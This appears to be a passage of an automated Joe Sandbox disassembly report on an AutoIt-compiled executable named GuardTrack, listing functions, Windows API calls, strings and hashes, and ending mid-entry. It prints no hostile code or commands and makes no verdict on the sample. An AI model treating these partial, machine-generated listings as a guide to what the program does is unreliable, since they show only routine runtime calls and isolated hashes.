                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: aababff323aafc2aa4f7a6091b0fabcb87d29eef9f2091c612e5e61897800860
                                                          • Instruction ID: 149d874afa5d1f37225312465a676c3cc03a51585c4986a8c173e57e118a273c
                                                          • Opcode Fuzzy Hash: aababff323aafc2aa4f7a6091b0fabcb87d29eef9f2091c612e5e61897800860
                                                          • Instruction Fuzzy Hash: C0F017705442A07AEB211B236C08E272E7FE7C6F10F01102ABA28A22B2C6711880CAB0
                                                          APIs
                                                            • Part of subcall function 005C4A8C: _fseek.LIBCMT ref: 005C4AA4
                                                            • Part of subcall function 00619CF1: _wcscmp.LIBCMT ref: 00619DE1
                                                            • Part of subcall function 00619CF1: _wcscmp.LIBCMT ref: 00619DF4
                                                          • _free.LIBCMT ref: 00619C5F
                                                          • _free.LIBCMT ref: 00619C66
                                                          • _free.LIBCMT ref: 00619CD1
                                                            • Part of subcall function 005D2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,005D9C54,00000000,005D8D5D,005D59C3,?), ref: 005D2F99
                                                            • Part of subcall function 005D2F85: GetLastError.KERNEL32(00000000,?,005D9C54,00000000,005D8D5D,005D59C3,?), ref: 005D2FAB
                                                          • _free.LIBCMT ref: 00619CD9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                          • API String ID: 1552873950-2806939583
                                                          • Opcode ID: fd6364e00a82ab507e73b3f603ffd602d6ccecf4d53230871cc746d3bc53c91e
                                                          • Instruction ID: d952f6f687192087d645a9d01c0f2eb82445c4fbd0d6d290b538f1a0507fc7e8
                                                          • Opcode Fuzzy Hash: fd6364e00a82ab507e73b3f603ffd602d6ccecf4d53230871cc746d3bc53c91e
                                                          • Instruction Fuzzy Hash: 9F512DB1904219AFDF249FA4DC55A9EBBBAFF88304F00049EB649A3341D7715A80CF59
                                                          APIs
                                                            • Part of subcall function 005D593C: __FF_MSGBANNER.LIBCMT ref: 005D5953
                                                            • Part of subcall function 005D593C: __NMSG_WRITE.LIBCMT ref: 005D595A
                                                            • Part of subcall function 005D593C: RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,?,?,?,?,005D1003,?,0000FFFF), ref: 005D597F
                                                          • std::exception::exception.LIBCMT ref: 005D101C
                                                          • __CxxThrowException@8.LIBCMT ref: 005D1031
                                                            • Part of subcall function 005D87CB: RaiseException.KERNEL32(?,?,0000FFFF,0066CAF8,?,?,?,?,?,005D1036,0000FFFF,0066CAF8,?,00000001), ref: 005D8820
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID: `=d$`=d$h=d
                                                          • API String ID: 3902256705-3433976909
                                                          • Opcode ID: 36332fc13354444e05dc334de47c4de2ab20fb6ea8f894983ae4741d06540d1e
                                                          • Instruction ID: c0a63d94a93eb13d8e6a88fd2b50304db668bd19ca87b88c9c7634e2fe0a10e9
                                                          • Opcode Fuzzy Hash: 36332fc13354444e05dc334de47c4de2ab20fb6ea8f894983ae4741d06540d1e
                                                          • Instruction Fuzzy Hash: 29F0813550461EB6DB30BB9CE819AAE7FACBF41710F200467F91492391EFB18A80C2A5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                          • Instruction ID: 75a00a1994e13321613c38f10d2e36132c69db1d3c26f954fd34f2c44e2cc4f2
                                                          • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                          • Instruction Fuzzy Hash: C4518F30A00B06DBDB389E6D888466E7FA5FB403A0F748B6BF825963D0E7709D51DB40
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,005B1275,SwapMouseButtons,00000004,?), ref: 005B12A8
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,005B1275,SwapMouseButtons,00000004,?), ref: 005B12C9
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,005B1275,SwapMouseButtons,00000004,?), ref: 005B12EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 5e0819e10308304804fde9e26990d0d4190ce4af9744be66e3f723083f5be9b1
                                                          • Instruction ID: cd823c177ecd1ce6d7a8c673a9dc63dfce4f27f1aafc6342b084de4c3aeace5e
                                                          • Opcode Fuzzy Hash: 5e0819e10308304804fde9e26990d0d4190ce4af9744be66e3f723083f5be9b1
                                                          • Instruction Fuzzy Hash: 83115A79510618BFEF608FA5DC84EEEBBB8FF05740F504959F905D7110E231AE4097A8
                                                          APIs
                                                            • Part of subcall function 005C49C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,005C27AF,?,00000001), ref: 005C49F4
                                                          • _free.LIBCMT ref: 005FFB04
                                                          • _free.LIBCMT ref: 005FFB4B
                                                            • Part of subcall function 005C29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005C2ADF
                                                          Strings
                                                          • Bad directive syntax error, xrefs: 005FFB33
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: Bad directive syntax error
                                                          • API String ID: 2861923089-2118420937
                                                          • Opcode ID: 5b9a026d4bd519e589f76fb17fe15a10b2037ee7ce23bba911b0008f42ac89ee
                                                          • Instruction ID: 86927b687a3761174b9a4394037530c47b8be947dfe4bcca9bc63eac3fb27872
                                                          • Opcode Fuzzy Hash: 5b9a026d4bd519e589f76fb17fe15a10b2037ee7ce23bba911b0008f42ac89ee
                                                          • Instruction Fuzzy Hash: BB91AC7190021EAFCF14EFA4CC95AEEBBB5BF48300F14442EF915AB2A1DB349945CB54
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: AU3! ?d$EA06
                                                          • API String ID: 4104443479-44268730
                                                          • Opcode ID: f2f6104b4e62ef142544be0e0d7fc8d5d7e2fe73da08a422cb73aa04316c213e
                                                          • Instruction ID: a60fdc8deacf42172062e660ebc0e8b52d9c1e317919d9676253940c3ef99d2d
                                                          • Opcode Fuzzy Hash: f2f6104b4e62ef142544be0e0d7fc8d5d7e2fe73da08a422cb73aa04316c213e
                                                          • Instruction Fuzzy Hash: A4414B21A041685FDF259BD48C65FFF7FA6BB85310F58846DE882A7386D6308D848BA1
                                                          APIs
                                                            • Part of subcall function 005C4AB2: __fread_nolock.LIBCMT ref: 005C4AD0
                                                          • _wcscmp.LIBCMT ref: 00619DE1
                                                          • _wcscmp.LIBCMT ref: 00619DF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: 1de0a72684861f16c8fc82869bc71622108ee88cd34fec6c4b222475fd9d707d
                                                          • Instruction ID: 6ab5386034d013b85d593267d91a1aecf24587532ca8f638f5dab6894e5d2a2a
                                                          • Opcode Fuzzy Hash: 1de0a72684861f16c8fc82869bc71622108ee88cd34fec6c4b222475fd9d707d
                                                          • Instruction Fuzzy Hash: 2041D971A4020ABADF21DAE4CC59FDF7BFEEF85710F04446AF900E7281D67199448BA5
                                                          APIs
                                                          • _memset.LIBCMT ref: 0060032B
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00600375
                                                            • Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4
                                                            • Part of subcall function 005D09C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005D09E4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 5ffd0adf6a41c16a3c06a0ba9624522da6b16a8d107ddf51868940a3dd54af9f
                                                          • Instruction ID: 8c37ca09658908227621a608055a1c1ceb39107ec56c2994689bde38f9686ad1
                                                          • Opcode Fuzzy Hash: 5ffd0adf6a41c16a3c06a0ba9624522da6b16a8d107ddf51868940a3dd54af9f
                                                          • Instruction Fuzzy Hash: 5321A471A002899FDF15DFD8C849BEE7FF9AF89310F00405AE404A7281DBB55A88DFA1
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 713cfdaa102aa460de0f020ef0c2b78bedef15172bde8595471c8a385f580083
                                                          • Instruction ID: d2fbbf20a44e4cf86f7859e7f034ac0ff6fe9a9dccb4ebaafe7bb3cfbb2ab8a4
                                                          • Opcode Fuzzy Hash: 713cfdaa102aa460de0f020ef0c2b78bedef15172bde8595471c8a385f580083
                                                          • Instruction Fuzzy Hash: 42F149706087519FC714DF28D484A6ABBE6FF88314F14892EF8999B352D770E945CF82
                                                          APIs
                                                          • _memset.LIBCMT ref: 005C59F9
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 005C5A9E
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 005C5ABB
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_$_memset
                                                          • String ID:
                                                          • API String ID: 1505330794-0
                                                          • Opcode ID: f509be296e1a0d48892d9bef21ad4b7f14d1e65d024ea8925601227b8566c481
                                                          • Instruction ID: 6509ec2634759e28636186815bb8692de6dafa499d9b71867d7fe5b55782a49c
                                                          • Opcode Fuzzy Hash: f509be296e1a0d48892d9bef21ad4b7f14d1e65d024ea8925601227b8566c481
                                                          • Instruction Fuzzy Hash: FD3161B05057018FD725DFA5D884B97BBF4FB49305F000A2EF6AA86251E771AA84CB52
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 005D5953
                                                            • Part of subcall function 005DA39B: __NMSG_WRITE.LIBCMT ref: 005DA3C2
                                                            • Part of subcall function 005DA39B: __NMSG_WRITE.LIBCMT ref: 005DA3CC
                                                          • __NMSG_WRITE.LIBCMT ref: 005D595A
                                                            • Part of subcall function 005DA3F8: GetModuleFileNameW.KERNEL32(00000000,006753BA,00000104,?,00000001,005D1003), ref: 005DA48A
                                                            • Part of subcall function 005DA3F8: ___crtMessageBoxW.LIBCMT ref: 005DA538
                                                            • Part of subcall function 005D32CF: ___crtCorExitProcess.LIBCMT ref: 005D32D5
                                                            • Part of subcall function 005D32CF: ExitProcess.KERNEL32 ref: 005D32DE
                                                            • Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58
                                                          • RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,?,?,?,?,005D1003,?,0000FFFF), ref: 005D597F
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: 886568c3a884ce1929edfb97e816b5f13a70c12723a91eb97fa3f40513e7f7d0
                                                          • Instruction ID: 78973b82e65050e2538cdeb17d10f84312536d23f5932aad5a6c984da092134c
                                                          • Opcode Fuzzy Hash: 886568c3a884ce1929edfb97e816b5f13a70c12723a91eb97fa3f40513e7f7d0
                                                          • Instruction Fuzzy Hash: 37012231201B06DAE7353B3DA866A2E3B4ABF92370F600427F4199B3D1EEB08D40C661
                                                          APIs
                                                          • _free.LIBCMT ref: 006192D6
                                                            • Part of subcall function 005D2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,005D9C54,00000000,005D8D5D,005D59C3,?), ref: 005D2F99
                                                            • Part of subcall function 005D2F85: GetLastError.KERNEL32(00000000,?,005D9C54,00000000,005D8D5D,005D59C3,?), ref: 005D2FAB
                                                          • _free.LIBCMT ref: 006192E7
                                                          • _free.LIBCMT ref: 006192F9
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 8f9c885abd8d04f58f23861dbdfd965b3870b9dc3bd9b8c44eca69e8d43aff98
                                                          • Instruction ID: 090f433f5ed08290467fb2269eb8f3cc6c28571aee94b5246ac639058644f96e
                                                          • Opcode Fuzzy Hash: 8f9c885abd8d04f58f23861dbdfd965b3870b9dc3bd9b8c44eca69e8d43aff98
                                                          • Instruction Fuzzy Hash: F2E0C2E160460353CA30A63C6845EC3BBEC1FC8311B18080FB409D3742CE30E8C08078
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,00617016,00000000,?,0061710A,00000000,00000000,005F2F49), ref: 00617237
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00617016,00000000,?,0061710A,00000000,00000000,005F2F49), ref: 0061723F
                                                          • DuplicateHandle.KERNELBASE(00000000,?,00617016,00000000,?,0061710A,00000000,00000000,005F2F49), ref: 00617246
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcess$DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 1294930198-0
                                                          • Opcode ID: d049107ada330d5ff3cab757599bb3a5341ed946c5b0eae2781bd404afa85184
                                                          • Instruction ID: 3f7b43e53f0b786916a75033b5a44bedacc59767faa1ef27c3e7dc9c0feca73b
                                                          • Opcode Fuzzy Hash: d049107ada330d5ff3cab757599bb3a5341ed946c5b0eae2781bd404afa85184
                                                          • Instruction Fuzzy Hash: 18D02E3E010300BFE7011BE4EC0DFBB3B7EDBC2B22F205018F305862909AB085425620
                                                          APIs
                                                            • Part of subcall function 006177EB: InterlockedExchange.KERNEL32(?,?), ref: 006177FE
                                                            • Part of subcall function 006177EB: EnterCriticalSection.KERNEL32(?,?,005BC2B6,?,?), ref: 0061780F
                                                            • Part of subcall function 006177EB: TerminateThread.KERNEL32(00000000,000001F6,?,005BC2B6,?,?), ref: 0061781C
                                                            • Part of subcall function 006177EB: WaitForSingleObject.KERNEL32(00000000,000003E8,?,005BC2B6,?,?), ref: 00617829
                                                            • Part of subcall function 006177EB: InterlockedExchange.KERNEL32(?,000001F6), ref: 0061783C
                                                            • Part of subcall function 006177EB: LeaveCriticalSection.KERNEL32(?,?,005BC2B6,?,?), ref: 00617843
                                                          • FindCloseChangeNotification.KERNELBASE(?,?,006170DF), ref: 0061708A
                                                          • CloseHandle.KERNEL32(?,?,006170DF), ref: 00617093
                                                          • DeleteCriticalSection.KERNEL32(?,?,006170DF), ref: 006170A6
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$CloseExchangeInterlocked$ChangeDeleteEnterFindHandleLeaveNotificationObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 744473657-0
                                                          • Opcode ID: eac173da86f7f5d0ce55feb3ff1dd7c0a4f3229daa2e8ade9e827d47a42cfc42
                                                          • Instruction ID: a0cd046dca4833708e91d7639d2f97e5a40a69e8f2328a0c6b1dd9e3b8aa2105
                                                          • Opcode Fuzzy Hash: eac173da86f7f5d0ce55feb3ff1dd7c0a4f3229daa2e8ade9e827d47a42cfc42
                                                          • Instruction Fuzzy Hash: A8E0EC3A000617FBD7422FA4FC0D889BFBABF45B113141516F50581A30CB7194B4CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CALL
                                                          • API String ID: 0-4196123274
                                                          • Opcode ID: 7d3fb2e9d28c7aa920601e012983d8e4bf45be2020120372f900dd99c99906d7
                                                          • Instruction ID: 51a4f038c91cbe25c7d88064cf37570119735dad50a93eb3f92ddec93eb78756
                                                          • Opcode Fuzzy Hash: 7d3fb2e9d28c7aa920601e012983d8e4bf45be2020120372f900dd99c99906d7
                                                          • Instruction Fuzzy Hash: 15324A74508741DFDB28DF14C499BAABBE1BF84300F15896DE88A9B362D735EC45CB82
                                                          APIs
                                                          • _strcat.LIBCMT ref: 0062E20C
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          • _wcscpy.LIBCMT ref: 0062E29B
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                          • String ID:
                                                          • API String ID: 1012013722-0
                                                          • Opcode ID: 4e1ff084c8d397420e0fea8673c45fbe7a36062e4c78b7c0b623e6e72541cea8
